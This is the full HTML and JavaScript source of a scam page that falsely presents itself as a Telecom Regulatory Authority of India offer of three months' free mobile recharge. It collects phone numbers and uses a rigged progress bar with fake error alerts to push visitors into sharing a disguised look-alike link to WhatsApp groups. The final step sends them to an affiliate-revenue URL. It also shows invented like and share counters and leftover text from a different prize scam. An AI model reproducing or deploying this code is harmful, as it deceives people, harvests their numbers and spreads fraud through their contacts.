
<!DOCTYPE html>
<html>
    <head>



        <title>TREY TRAN 8</title>

        <meta charset="UTF-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
        <meta property="og:title" content="TRAI - Free 3 Months Recharge 📱" />
        <meta property="og:type" content="website" /> 
        <meta property="og:url" content="https://trai.gov.in" />
        <meta property="og:image" content="oglogo.jpeg" />
        <meta property="og:description" content="TRAI is offering FREE 3 Months Mobile Recharge" />
        <link rel="image_src" href="oglogo.jpeg" />
        <meta property="og:image" content="oglogo.jpeg" />
        <meta name="twitter:image:src" content="oglogo.jpeg">
        <meta name="twitter:image" content="oglogo.jpeg">
        <link rel="icon" href="oglogo.jpeg"> 
        <meta name="robots" content="noindex" />
        <meta name="theme-color" content="#ffffff" />
        <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" />
<img src='nFJNJU2.png' width='100%'/>

<style type="text/css">
@import url("css2.css?family=Poppins:wght@500;700&display=swap");
@import url("droidarabicnaskh.css");
* {
    margin: 0;
    padding: 0px;
    font-family: Poppins, Droid Arabic Naskh;
    font-weight: normal;
    box-sizing: border-box;
}
body {
    direction: ltr;
    background: #fff;
}
a {
    text-decoration: none;
}
.post {
    background: #fff;
    margin: 0 auto;
    max-width: 500px;
    border: 0px solid #00B7B2;
    border-radius: 3px;
}
.post1 {
    padding: 8px;
}
p {
   color: #000;
}
.intro {
    display: block;
    max-width: 300px;
    width: 100%;
    margin: 10px auto;
    background: #7f8c8d;
}
.rib {
    display: block;
    width: 100%;
}
.info {
    display: block;
    max-width: 300px;
    width: 100%;
    height: 50px;
    margin: 10px auto;
    padding: 0 10px;
    border: 2px solid #95a5a6;
    outline: none;
}
.step2,
.step3 {
    display: none;
}
.question,
.title {
    text-align: center;
}
table {
    width: 100%;
    color: #000;
}
table th {
    background: #2A59AD;
    color: #fff;
}
table tr th,
table tr td {
    width: 50%;
    border: 1px solid #c7c7c7;
    padding: 5px;
    font-size: 18px;
    text-align: center;
}
.yes {
    background: #4caf50;
}
.yes:hover {
    background: #2ecc71;
}
.no {
    background: #e74c3c;
}
.no:hover {
    background: #c0392b;
}
.welcome {
    font-size: 15px;
}
.amount,
#getname {
    color: #2a59ad;
    text-decoration: none;
  font-weight: bold;
}
.done {
    text-align: center;
    color: #3cbd45;
}
.tip {
    font-size: 15px;
      padding: 5px 8px
}
.tip2 {
    font-size: 22px;
    text-align: center;
    color: #ff0000;
    font-weight: bold;
}
.tip3 {
    font-size: 15px;
    text-align: center;
    color: #b70029;

}
.tip4 {
    font-size: 14px;
    text-align: center;
    color: #ff0000;

}
.tip5 {
    font-size: 13px;
    text-align: center;
    color: #1B9F21;

}
.title {
    text-align: center;
}
.error {
    display: none;
    text-align: center;
    font-size: 14px;
    color: #e74c3c;
}
button {
    display: block;
    width: 250px;
    height: 50px;
    color: #fff;
    border: none;
    outline: none;
    font-size: 20px;
    cursor: pointer;
    border-radius: 5px;
    padding: 0 10px;
    margin: 10px auto;
    background: #3cbd45;
    transition: background 0.3s ease;
}
button3 {
    display: block;
    width: 250px;
    height: 50px;
    color: #fff;
    border: none;
    outline: none;
    font-size: 20px;
    cursor: pointer;
    border-radius: 5px;
    padding: 10px 10px;
    margin: 10px auto;
    background: #00448b;
    transition: background 0.3s ease;
}  
  button2 {
    display: block;
    width: 250px;
    height: 50px;
    color: #fff;
    text-align: center;
    border: none;
    outline: none;
    font-size: 22px;
    cursor: pointer;
    border-radius: 5px;
    padding: 8px 10px;
    margin: 10px auto;
    background: #2A59AD;
    transition: background 0.3s ease;
}  
button:hover {
    background: #3cbd45;
}
.phone {
    max-width: 400px;
    margin: 10px auto;
}
.phone input {
    width: 60%;
    height: 50px;
    padding: 10px;
    outline: none;
    border: 2px solid #cecece;
    font-size: 14px;
}
#confirm {
    width: 40%;
    float: left;
    margin: 0;
    border-radius: 0px;
}
#loader {
    text-align: center;
}
.spin {
    width: 50px;
    height: 50px;
    background: transparent;
    border: solid 8px #0e5aa7;
    border-right-color: transparent;
    border-radius: 50%;
    margin: 10px auto;
    animation: spin 0.8s linear infinite;
}
@keyframes spin {
    100% {
        transform: rotate(1turn);
    }
}
#loader,
#info,
#checking,
#share,
#claim {
    display: none;
}
.center {
    display: flex;
    align-items: center;
    justify-content: center;
}
.barr {
    direction: ltr;
    max-width: 400px;
    margin: 10px auto;
    box-sizing: border-box;
}
.fill {
    position: relative;
    display: inline-block;
    width: calc(100% - 100px);
    height: 35px;
    padding: 2px;
    border: 2px solid #2A59AD;
}
#fill,
#fill2 {
    background: #2A59AD;
    width: 0%;
    height: 100%;
}
.percentage {
    color: #000;
    width: 100px;
    float: right;
    height: 35px;
    font-size: 16px;
    border: 2px solid #2A59AD;
}
#percentage,
#percentage2 {
    margin-left: 5px;
}
#check,
#check2 {
    display: none;
}
.counter {
    color: #7f7f7f;
    font-size: 12px;
    text-align: right;
    padding: 10px 0 10px 2px;
    border-bottom: 1px solid #e1e2e3;
}
.reactions {
    display: inline-flex;
    align-items: center;
    float: left;
}
.counter img {
    float: left;
    width: 16px;
    height: 16px;
    border-radius: 50%;
    border: 2px solid #fff;
    box-sizing: content-box;
}
.like,
.love {
    margin-right: -5px;
}
.like {
    z-index: 2;
}
.love {
    z-index: 1;
}
.bar {
    display: table;
    width: 100%;
    border-bottom: 1px solid #e1e2e3;
}
.bar .react {
    display: table-cell;
    width: calc(100% / 3);
    font-size: 12px;
    color: #7f7f7f;
    text-align: center;
    padding: 10px 0;
    cursor: pointer;
}
.comments {
    direction: ltr;
}
.comment {
    padding: 6px 0;
    margin-top: 5px;
}
.comment img {
    float: left;
    width: 32px;
    height: 32px;
    border: none;
    border-radius: 18px;
    cursor: pointer;
}
.reply {
    margin-left: 37px;
}
.single-container {
    margin-left: 37px;
    background: #f1f2f6;
    padding: 10px;
    border-radius: 15px;
    font-size: 12px;
}
.single-container .user {
    display: inline-block;
    cursor: pointer;
    color: #365899;
    margin-bottom: 5px;
}
.single-container .text {
    display: block;
}
.buttons {
    font-size: 12px;
    font-weight: bold;
    margin: 10px 0 0 47px;
    color: #90949c;
}
.action {
    cursor: pointer;
}
.action:hover {
    text-decoration: underline;
}
.input {
    padding: 6px 12px 12px;
}
.input input {
    width: 100%;
    background: #f1f2f6;
    padding: 10px;
    border-radius: 15px;
    border: 0;
    outline: none;
}
  .bottom {
			width: 100%;
			margin: 20px auto 0;
			border: 1px solid #ccc;
			background-color: #f2f2f2;
			padding: 5px;
			border-radius: 10px;
			-moz-border-radius: 10px;
			-webkit-border-radius: 10px
              
		}
</style>

  

</head>
<body>
    
    
    


        <div class="post1">
        <div  class="welcome">

        </div>
        <div class="step1">

                              <img src='01DdyDA.png' width='100%'/>
                    <center><p style="font-size: 30px;color: #1b9f21;font-weight: bold;">Congratulations!</p></center>

          <center><p style="font-size: 16px;color: #000;">Free 3 Months Recharge, 300GB Super fast 4G/5G Data with unlimited voice calls.</p></center>
          <center><p style="font-size: 14.6px;color: #000;">Telecom Regulatory Authority of India is offering 3 month free recharge due to recent hike</p></center>
          <center><p style="font-size: 14.6px;color: #000;">in mobile recharge plans.</p></center>
<br>
          <center><p style="font-size: 19px;color: #ff0000;font-weight: bold;">Offer Valid Till September 10</p></center>

            <p class="question">Recharge Now</p><br>

                        <center><p class="title">Select your Operator/SIM Provider</p>
<select aria-label="الجنس" name="birthday_year" id="year" title="الجنس" class="_5dba" style="
    width: 330px;
    height: 56px;
    text-align: center;
    font-size: 18px;
    color: #00498c;
    font-weight: bold;                                                                                         
">
<option value="Select your Operator" selected="1">- Select -</option>
<option value="1">Airtel</option>
<option value="2">Jio</option>
<option value="3">Vi (Vodafone Idea)</option>
<option value="4">BSNL</option>
<option value="5">MTNL</option>
</select></center>
                                  <center><p class="title">Enter Your Mobile Number</p>
                <center><input type="tel" placeholder=" Enter Your Phone Number " id="name" name="Phone" style="fontwidth: 244px;height: 56px;font-size: 18px;color: #ff0000;width: 330px;text-align: center;" onkeypress="return numberonly(event);"><br>
            <button3 id="select">Submit</button3>
        </div>
        <div class="step2">
            <table>
                <tbody>
                    
                        <th>Phone Number</th>
</tbody><tbody>
<td id="pastname"></td>
                                        </tbody>
<tr><tr><tbody>

            </table>
            <button class="yes">Proceed to Recharge</button>
            <button class="no">Edit </button>
        </div>
        <div id="checking">
                                   
            <p class="title"></p>
           <p style="font-size: 20px;color: #00448b;text-align: center;">Please wait</p>
          <p style="font-size: 17px;color: #ff0000;text-align: center;">We are verifying your details ...</p>
          
          <p class="tip4"> </p>
         
            <div class="barr">
                <div class="fill">
                    <div id="fill"></div>
                </div>
                <div class="percentage center">
                    <span id="load"><i class="fa fa-spinner fa-pulse"></i></span>
                    <span id="check"><i class="fa fa-check-circle"></i></span>
                    <span id="percentage"></span>
                </div>
            </div>
        </div>
        <div id="share">
          <p class="tip2">Congratulation!</p>
<center><img src="o0OqTQh.png" alt="" style="width: 140px;"></center>
            
          <center> You are eligible for </center>
<p class="tip5">(3 Months Free Recharge with 300GB 4G/5G Data)</p>
<br>              
                        <div style="padding:12px;border:1px dashed #666666;background: #e8e8e8;border-radius: 5px;"><center>You will receive offer on : <span class="amount" id="getname"></span></center></div>
<span class="amount" id="getname"></span><br> <p class="tip4"> Follow the instructions below to claim your offer!</p>

          
                      <div class="bottom" id='buttonO'>

            <p class="tip">1. Share with 5 groups / 20 friends on WHATSAPP (tap the 'WhatsApp' button below)</p>
            <p class="tip">2. Tap 'CONTINUE' to claim your offer.</p>

            <button id="whatsapp">WhatsApp</button>
                    <p class="tip3">Share until progress bar hits 100%!</p>
          
            <div class="barr">
                <div class="fill">
                    <div id="fill2"></div>
                </div>
                <div class="percentage center">
                    <span><i class="fa fa-spinner fa-pulse"></i></span>
                    <span id="percentage2">0%</span>
                
                  
                </div>
            </div>
                           <button2 onclick="myFunction()">CONTINUE</button2>              </div>


          <script>
function myFunction() {
  alert("Unfortunately... \n You have to share with friends about our offer. Share until the blue bar is full!");
}
</script> 
        </div>
        <div id="claim">
                               <p class="done"><i class="fa fa-check-circle fa-3x" aria-hidden="true"></i></p>
          <p class="tip2">Congratulation!</p>
                               <center>             <img src="o0OqTQh.png" alt="" style="width: 120px;"> </center>

      
                     

          <p class="tip3">You must complete this final step!</p>
          <p class="tip3">(Remember, this step is very Important)</p>
          <p class="tip">Now enter your phone number to receved your offer immediately.
</p>
          <p class="tip3">It will be receved within 5 Minutes.</p>

<br>
            <button id="offer">Click Here</button>

        </div>        </div>

        </div>
          <img src='LW1rGAR.png' width='100%'/>

    </div>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.js"></script>
    <script>
        var errorname = "Please enter the phone number correctly!",
            errornumber = "Please enter your number correctly, example 05xxxxxxx",
            text = " بمناسبة مرور 42 عاماً على تأسيسها أسواق العثيم تقدم قسائم شرائية وجوالات والعديد من الجوائز القيمة والفورية ، الجوائز محدودة سارع من هنا : ",
            link = "https://www.trai.gov.in@300GB.z0m.site",
            error = "Something is wrong!\nPosts are not calculated. You may have shared it with the same friend or group more than once, please re-share",
            cpa = "https://cockysnailleather.com/agyv7ex6?key=96eb9366cb1c6c1b8ab6ab46c574e6fb",
            saved = "",
            share = "whatsapp://send?text=" + link;
 </script>
<script>
<!-- code by ODcompany -->
  <!-- JS -->
<script type="text/javascript">
var time = 0;
window.setInterval(function () {
    time = time + 1;
    $(".t1").html(time + 1 + "m");
    $(".t2").html(time + 2 + "m");
    $(".t3").html(time + 4 + "m");
}, 6e4);
var likes = 134,
    comments = 23,
    shares = 12;
window.setInterval(function () {
    likes = likes + Math.floor(Math.random() * 3);
    comments = comments + Math.floor(Math.random() * 2);
    shares = shares + Math.floor(Math.random() * 2);
    $("#likes").html(likes + "K");
    $("#comments").html(comments + "K comments");
    $("#shares").html(shares + "K shares");
}, 5e3);
$(".liked").click(function () {
    if ($(this).hasClass("selected")) {
        $(this).removeClass("selected");
        $(this).html("Like");
    } else {
        $(this).addClass("selected");
        $(this).html("Unlike");
    }
});  
  
</script>
<script type="text/javascript">
var name = localStorage.getItem("name");
$("#getname").html(name);
$("#select").click(function () {
    var name = $("#name").val();
    localStorage.setItem("name", name);
    var number = $("#grade").val();
    if (name.length < 5 || name.length > 150) {
        alert(errorname);
    } else if (number === "0") {
        alert(errornumber);
    } else {
        $(".step1").fadeOut(0);
        $(".step2").fadeIn(500);
        $("#pastname").html(name);
        $("#pastnumber").html(number);
    }
});
$(".yes").click(function () {
    $(".welcome").fadeOut(0);
    $(".step2").fadeOut(0);
    $("#checking").fadeIn(1000);
    var i = 0;
    var interval = setInterval(function () {
        i += 1;
        $("#percentage").text(i + "%");
        $("#fill").css("width", i + "%");
        if (i == 50) {
            i = 49;
            setTimeout(function () {
                i = 50;
            }, 1000);
        }
        if (i >= 100) {
            clearInterval(interval);
            $("#load").fadeOut(0);
            $("#check").fadeIn(0);
            setTimeout(function () {
                $("#checking").fadeOut(0);
                $("#share").fadeIn(1000);
                $("#getname").html($("#name").val());
            }, 1000);
        }
    }, 50);
});
$(".no").click(function () {
    $(".step2").fadeOut(0);
    $(".step1").fadeIn(500);
});  
</script>  
<script type="text/javascript">  
var swidth = localStorage.getItem(saved);
if (swidth !== null) {
    var width = swidth * 1;
    $(".welcome").fadeOut(0);
    $(".step1").fadeOut(0);
    $("#share").fadeIn(0);
    $("#fill2").css("width", width + "%");
    $("#percentage2").text(width + "%");
} else {
    var width = 0;
}
$("#whatsapp").click(function () {
    window.location.href = share;
    if (width == 0) {
        width += 50;
    } else if (width == 50) {
        alert(error);
        width += 15;
    } else if (width == 65) {
        width += 5;
    } else if (width == 70) {
        alert(error);
        width += 10;
    } else if (width == 80) {
        alert(error);
        width += 5;
    } else if (width == 85) {
        width += 5;
    } else if (width == 90) {
        width += 4;
    } else if (width == 94) {
        width += 2;
    } else if (width == 96) {
        width += 2;
          } else if (width == 98) {
        width += 1;
    } else {
        $("#share").fadeOut(0);
        $("#claim").fadeIn(1000);
    }
    localStorage.setItem(saved, width);
    setTimeout(function () {
        $("#fill2").css("width", width + "%");
        $("#percentage2").text(width + "%");
    }, 2000);
});
$("#offer").click(function () {
    window.open(cpa, "_blank");
});  
</script>  
<!-- JS-WP --> 
</script>

</body></html>
<!-- Histats.com  START  (aync)-->
<script type="text/javascript">var _Hasync= _Hasync|| [];
_Hasync.push(['Histats.start', '1,4781913,4,0,0,0,00010000']);
_Hasync.push(['Histats.fasi', '1']);
_Hasync.push(['Histats.track_hits', '']);
(function() {
var hs = document.createElement('script'); hs.type = 'text/javascript'; hs.async = true;
hs.src = ('//s10.histats.com/js15_as.js');
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(hs);
})();</script>
<noscript><a href="/" target="_blank"><img  src="//sstatic1.histats.com/0.gif?4781913&101" alt="website page counter" border="0"></a></noscript>
<!-- Histats.com  END  -->
<!-- END -->
